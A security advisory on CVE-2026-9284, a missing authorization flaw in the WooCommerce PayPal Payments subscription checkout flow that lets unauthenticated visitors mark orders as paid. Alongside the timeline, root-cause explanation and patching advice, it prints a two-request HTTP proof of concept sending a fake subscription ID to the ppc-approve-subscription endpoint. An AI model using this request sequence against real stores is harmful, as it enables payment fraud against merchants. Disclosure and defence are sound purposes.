CVE-2026-9284 affects WooCommerce PayPal Payments and it is a missing authorization issue in the subscription approval checkout flow. In vulnerable builds up to 4.0.1, a public WC-AJAX request can place a client supplied PayPal subscription identifier into the WooCommerce session, and the subscriptions integration can later treat that session value as enough evidence to complete a WooCommerce order. On stores that use WooCommerce Subscriptions with PayPal subscription checkout, this can let an unauthenticated visitor move an order to a paid state without a successful PayPal capture or approval, which creates direct financial risk and unreliable payment records.
| CVE | CVE-2026-9284 |
| Plugin Version | WooCommerce PayPal Payments up to 4.0.1, patched in 4.0.2 |
| All Time | 25 781 378 |
| Active installations | 800 000+ |
| Publicly Published | May 22, 2026 |
| Last Updated | May 23, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://www.cve.org/CVERecord?id=CVE-2026-9284 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-paypal-payments/woocommerce-paypal-payments-401-missing-authorization-to-unauthenticated-order-manipulation-and-information-disclosure |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| February 18, 2026 | Plugin testing and vulnerability detection in WooCommerce PayPal Payments have been completed |
| February 18, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| May 22, 2026 | Published CVE-2026-9284 |
Discovery of the Vulnerability
The vulnerable surface is the public WC-AJAX checkout action ppc-approve-subscription. In the affected flow, the request body contains a subscription_id value supplied by the browser. Instead of proving that this value is a real PayPal subscription connected to the current checkout and customer session, the handler stores it in the WooCommerce session as ppcp_subscription_id. That session key is then consumed by the subscriptions integration as a signal that the subscription approval step has happened. When the later order creation path sees the value, it can call WC_Order::payment_complete() and leave the normal PayPal order processing path. The important missing control is not only a nonce check. The server needs to bind the PayPal subscription, the WooCommerce order, and the current checkout session, then verify PayPal state before marking the order as paid.
Understanding of Missing Authorization attacks
Missing authorization in WordPress payment endpoints is especially dangerous because checkout flows often combine public AJAX routes, anonymous WooCommerce sessions, and high trust state transitions. A route can be public for legitimate buyers and still require strict server side authorization of every value that changes order state. Payment plugins should never treat client supplied identifiers as proof of payment. PayPal order IDs, subscription IDs, approval flags, funding sources, and checkout context values must be resolved and validated on the server against the processor API and the WooCommerce order record. If that binding is skipped, an attacker can move state between requests and make the store trust data that came from the attacker rather than from PayPal.
Exploiting the Missing Authorization Vulnerability
To reproduce CVE-2026-9284 in a controlled lab store, the attacker does not need a WordPress account. The first request creates a PayPal order context for checkout. The second request sends any non-empty subscription_id to the subscription approval endpoint and asks the plugin to create the WooCommerce order. In vulnerable configurations with WooCommerce Subscriptions active, this can leave the WooCommerce order in a paid state even though the PayPal capture or approval did not succeed.
POC:
POST /?wc-ajax=ppc-create-order HTTP/2 Host: target.example Cookie: any WooCommerce session, or no authenticated account User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Referer: https://target.example/checkout/ Content-Type: application/json Content-Length: 43 Origin: https://target.example Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4 Te: trailers {"nonce":"PayPalCommerceGateway.ajax.create_order.nonce ","context":"checkout"} POST /?wc-ajax=ppc-approve-subscription HTTP/2 Host: target.example Cookie: any WooCommerce session, or no authenticated account User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Referer: https://target.example/checkout/ Content-Type: application/json Content-Length: 169 Origin: https://target.example Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4 Te: trailers {"nonce":"PayPalCommerceGateway.ajax.approve_subscription.nonce ","order_id":"6M3148632V5656017","subscription_id":"FAKE-SUBSCRIPTION-ID","funding_source":"paypal","should_create_wc_order":true}____
The practical impact is payment bypass. A shop can ship goods, grant digital access, or activate a subscription because WooCommerce sees a completed payment state while PayPal has not captured funds. The issue also damages accounting data because the WooCommerce order history no longer matches the processor record. For stores that sell subscriptions, memberships, downloadable products, or services with automatic provisioning, that mismatch can create immediate loss and later reconciliation work for administrators.
Recommendations for Improved Security
Site owners should update WooCommerce PayPal Payments to version 4.0.2 or newer. If immediate updating is not possible, subscription checkout through PayPal should be disabled until the patched version is deployed and recent orders should be reconciled against PayPal records. Developers should validate every PayPal subscription identifier server side, bind it to the current WooCommerce order and checkout session, and require a confirmed PayPal status before calling WC_Order::payment_complete(). A nonce can reduce cross site request risk, but it cannot replace authorization, ownership checks, and payment processor verification. Logging should also record when a payment completion path is skipped or when PayPal state cannot be confirmed.
By addressing missing authorization in payment AJAX workflows like CVE-2026-9284, WordPress store owners reduce payment bypass risk and keep order records aligned with real processor state. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuthorization #WooCommerceSecurity #PaymentSecurity #HighVulnerability
Use CleanTalk solutions to improve the security of your website